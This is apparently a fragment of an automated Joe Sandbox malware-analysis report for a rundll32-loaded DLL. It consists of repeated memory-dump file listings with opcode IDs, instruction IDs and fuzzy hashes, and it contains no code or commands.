                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 00635bb530e825c9d0e4eae4fa5f0d04fa1aae9444658eea7062a9f08f751ac7
                                                                                                                                                                                                                            • Instruction ID: c4e33da554af39ad710615a1f5e797122507a8c92191f57cbd2610347cb337db
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 00635bb530e825c9d0e4eae4fa5f0d04fa1aae9444658eea7062a9f08f751ac7
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3651A07211064897FBB79F68C0553EC27A0E74CBDCF158215FE590BA99CF25CA8AC706
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 808d36c95613ca1d96f87815bd2e9d4730f0d84ed3a8b0da53525a61fe22eb95
                                                                                                                                                                                                                            • Instruction ID: d6e1677531b3a496854411c86ee74cd0d779fe025018eda0722ff9683e8740e0
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 808d36c95613ca1d96f87815bd2e9d4730f0d84ed3a8b0da53525a61fe22eb95
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D251A372200A4886F7A79F29C4663ED37A0E70DBDCF158215FA490B699CF25CA4EC751
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 11f428b0f98b7b173f0c01802dd16e1e8637fc4858c1655c8fd3ad3d4946b8d2
                                                                                                                                                                                                                            • Instruction ID: e33614bd2a780dec1686e47beb4e2f72314e00fe528fbd3313490090ca0f5cb0
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 11f428b0f98b7b173f0c01802dd16e1e8637fc4858c1655c8fd3ad3d4946b8d2
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0951C673600618E2E7AB8F68C1543AC2760F759BA8F148215EF25177D8DF35DE49C780
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: e7e60a0049f3eb4e567eb1a50ce9358f85fa15bb52d747390f53d662bd00ce04
                                                                                                                                                                                                                            • Instruction ID: c4c80b8e2522cbaf43e69af424d1c7b52ee649788601b992e4c6bb7a9175c7d7
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e7e60a0049f3eb4e567eb1a50ce9358f85fa15bb52d747390f53d662bd00ce04
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C351B473610A58C2E7AB8F28C0543AD27A0E359BEAF149115EF8A177D9CF31DE49C784
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 4284ef4a3d324d7477f9cd69e5095c3d25c39bf25e636eee571efe97b0e4bfaa
                                                                                                                                                                                                                            • Instruction ID: 6201fb9c4269540b87b02fbf80bd25e871a96457373f9b96cbca059132ce15cb
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4284ef4a3d324d7477f9cd69e5095c3d25c39bf25e636eee571efe97b0e4bfaa
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9551057760465893E7AB8F68C1583AC37A0E758BA8F158204EF65177D8CF31CE89C780
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 1cfc43ee875369cbd8ef711c62d5bc21398ba66dc710bff29ea200516d337ab6
                                                                                                                                                                                                                            • Instruction ID: f802264b8b099b2471d7b705d3014f20973e902f7cb8bec0cd67e3be5e26f4d0
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1cfc43ee875369cbd8ef711c62d5bc21398ba66dc710bff29ea200516d337ab6
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6251E177614A5883E7AB8F28D0583AC27A0E358FAAF558114EF85177D8CF31CE4AC784
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 82ea92a84c11108f3071d3ef7c4aef159b60bd1316e4cbd30ad7b2407f0506b2
                                                                                                                                                                                                                            • Instruction ID: 61f18e9934135cd383c8a1121e81848670e0fc00189fa84ebd63a59a84f486c3
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 82ea92a84c11108f3071d3ef7c4aef159b60bd1316e4cbd30ad7b2407f0506b2
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2E51B17760065882E7AF8F29C0563AD27A0E359BA8F148119FF491B7D9CF30CE89C780
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 4409245e5aac3d18b98eac17c4d8a5d4deee1b150404dfee04382c3e03567e83
                                                                                                                                                                                                                            • Instruction ID: af5124eb92e539212a9bfdaf2550fbdbe9970ce5d4e0fb0380adbc846f39c625
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4409245e5aac3d18b98eac17c4d8a5d4deee1b150404dfee04382c3e03567e83
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2351B67761461883E7AB8F28C1563AC2760E759F98F158219EF8A177D9CF31CE89C780
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 7cd142f1823c9bffd79bf87b36575f5ef9ba918f7d80c7237d946f2cf57e3e6f
                                                                                                                                                                                                                            • Instruction ID: 339e56147fb3a3e97748ef8ca84e428e7f94d015c5d749535f169f2e8fa9f344
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7cd142f1823c9bffd79bf87b36575f5ef9ba918f7d80c7237d946f2cf57e3e6f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9551D577604A58CAE7AB8F28C0543ED2760E369BAAF258115EF09177D9CF31CE45C780
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 3ef757c396fc2c773b57472260c22829ad67b39d88b4eb98622a2e10d451259d
                                                                                                                                                                                                                            • Instruction ID: 2679f4f3b880ed247c94047be1046e109155bf0a35403dbca2e305a8bfe98763
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3ef757c396fc2c773b57472260c22829ad67b39d88b4eb98622a2e10d451259d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2851B577605A1882E7EB8F28C1543AC2760E759BA8F258115EF491F7D9CF31DD89C780
Memory Dump Source
• Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 485612231-0
                                                                                                                                                                                                                            • Opcode ID: f2bf2f44804211bbc956858bbddf9f4d52737702c71a905d465bb91da0ad6b12
                                                                                                                                                                                                                            • Instruction ID: fc019565bc309eafb7e8d69423c872a858b621f5fd49a27179c449119fb9b58e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f2bf2f44804211bbc956858bbddf9f4d52737702c71a905d465bb91da0ad6b12
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9141AF32710A5892EB85CF2AD9553D9A3A1B34CFD4F49D026EE4D87B68EE3DC2468305
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: a2ae6fed8cf75391e0291909193d044d3d9fe363135ba26d95f2311c859f37c2
                                                                                                                                                                                                                            • Instruction ID: 140c7d41740b8b8519f6bfbf387fa7969dbb6e49980347efb6bda0b36bebd412
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a2ae6fed8cf75391e0291909193d044d3d9fe363135ba26d95f2311c859f37c2
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DF419F72114A8881E7A68F2AC04939D77A1F35ABDCF288215EF9D4B7E9CF35C589C704
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: e7d0b9737ad121b3124e9f4498d8c0b31db2b34df03fba385aff4766f8564834
                                                                                                                                                                                                                            • Instruction ID: e207b00886b0c8d1c088dc1313d1619de03373ae8e53df3fdb771979a07e1de7
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e7d0b9737ad121b3124e9f4498d8c0b31db2b34df03fba385aff4766f8564834
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 48418D72214AD882E7A68F2AD08139977A1E34AB9CF188215EF5D0B7E9CF35C585C704
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: e7d0b9737ad121b3124e9f4498d8c0b31db2b34df03fba385aff4766f8564834
                                                                                                                                                                                                                            • Instruction ID: 59284e515db0d929f4191069cd426df7778dd2db08eb2369e4545667b882949d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e7d0b9737ad121b3124e9f4498d8c0b31db2b34df03fba385aff4766f8564834
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B7417E72208BC882E7A68F2AD08539D77A1E34AF98F289215EF9D0B7E5CF35C545C714
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: f7226ce8fd321ddddb00fa92aa08975f3542884d578256a1b0f875ad76357bb0
                                                                                                                                                                                                                            • Instruction ID: 08583fe5aa8dd3b47af6919775a42c2bb4a9465dec4194a7304c23a06bfae4bb
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f7226ce8fd321ddddb00fa92aa08975f3542884d578256a1b0f875ad76357bb0
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 59313E72204A98C6EB668F29E4403AD77A0F79CB8CF658126EB4C4B751DF36C596C704
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
